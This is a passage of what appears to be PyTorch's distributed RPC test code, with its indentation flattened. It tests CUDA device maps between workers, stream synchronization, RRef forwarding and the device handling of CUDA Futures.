if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
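# Checks that x and y arrive on the expected devices (x_to, y_to) and returns
# their sum on z_to; "cpu" is treated as its own device.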
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
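# Expects x on cuda:1 and y on cuda:0 on the callee (after the device map is
# applied) and returns (x + y) on cuda:0 and (x - y) on cuda:1.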
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
            # worker1 hosts the model and runs forward. The forward function
            # calls RRef.to_here(), and hence needs to configure the device map.
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
            # worker2 will get the output RRef and call to_here(), and hence
            # needs to configure the device map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
def _test_cuda_future_extraction(self, wrapper, unwrapper):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor.fill_(1)
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(unwrapper(future.wait()), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0]
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
